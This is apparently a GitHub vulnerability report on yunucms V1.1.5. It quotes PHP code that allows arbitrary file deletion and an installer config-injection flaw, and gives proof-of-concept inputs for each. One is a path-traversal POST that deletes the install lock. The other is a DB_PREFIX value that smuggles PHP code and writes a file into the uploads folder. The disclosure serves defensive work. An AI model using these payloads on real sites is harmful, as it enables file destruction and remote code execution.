New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Arbitrary File Deletion & Launch a new installation process to execute PHP code #1

Open
36huo opened this Issue Nov 9, 2018 · 0 comments

Comments

Projects
None yet
1 participant
@36huo
Contributor

36huo commented Nov 9, 2018

Two issue was discovered in yunucms V1.1.5。
1、Arbitrary File Deletion
2、Launch a new installation process to execute PHP code

1、There is a Arbitrary File Deletion attacks vulnerability which allows remote attackers to unlink any file

The code section which made this vulnerability possible is found in the /statics/ueditor/php/vendor/Local.class.php file:
line 34-68

	public function remove(){
		$file = trim($_POST['key']);
		$config    = $this->config;

		$root_path = $config['root_path'];

		//安全验证
		$pathlist = explode("/", $file); 
		if ($pathlist[0] != 'uploads' && $pathlist[1] != 'uploads') {
			return array(
				'state' => 'ERROR',
				'error' => 'Folders start from uploads'
			);
			exit();
		}

		$file_path = $root_path.$file;
		if( file_exists($file_path) ){
			$result = @unlink($file_path);
			if( $result ){
				return array(
					'state' => 'SUCCESS'
				);
			}else{
				return array(
					'state' => 'ERROR',
					'error' => 'delete file error'
				);
			}
		}

		return array(
			'state' => 'ERROR',
			'error' => 'file not exists'
		);
	}

In the remove() function shown above, the content of $_POST['key'] gets used in the call to unlink() without undergoing any authentication or sanitization.

POC

url:/statics/ueditor/php/controller.php?action=remove
POST: key=/uploads/../data/install.lock

image

/data/install.lock has been removed.

2、Launch a new installation process to execute PHP code
After remove /data/install.lock ,remote attackers can Launch a new installation process.
The code section which made this vulnerability possible is found in the /statics/app/index/controller/Install.php file:
line 117-131

	        //修改数据库文件
	        $coffile = CONF_PATH.DS.'database.php';
            Config::load($coffile, '', 'database');
            $conflist = Config::get('','database');
            $param = array(
            	'hostname'	=>	$data['DB_HOST'],
            	'hostport'	=>	$data['DB_PORT'],
            	'database'	=>	$data['DB_NAME'],
            	'username'	=>	$data['DB_USER'],
            	'password'	=>	$data['DB_PWD'],
            	'prefix'	=>	$data['DB_PREFIX']
           	);

            setConfigfile($coffile, array_merge($conflist, $param));
	        $showstr .= show_msg('配置数据库信息完成...');

Follow function setConfigfile(),in /app/admin/common.php file:
line 76-87

//写入配置文件
function setConfigfile($file, $arr){
    $str="<?php \nreturn [\n";
    foreach($arr as $key=>$v){
        /*$v = htmlspecialchars_decode($v);
        $v = htmlspecialchars($v);*/

        $str.= "\t'".$key."'=>'".$v."',\n";
    }
    $str.="];\n";
    file_put_contents($file, $str);
}

Use file_put_contents to wirte $arr into $file(config\database.php)

POC
In installation process setup2 ,we can input yunu_',].die(file_put_contents('uploads\image\f4ck.php','<?=phpinfo();?>'));$a=['a'=>' to 数据表前缀 DB_PREFIX
image

When finish installation process,we can get /data/database.php like this:
image

Visit homepage http://127.0.0.1:81,will create file /uploads/image/f4ck.php
image

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment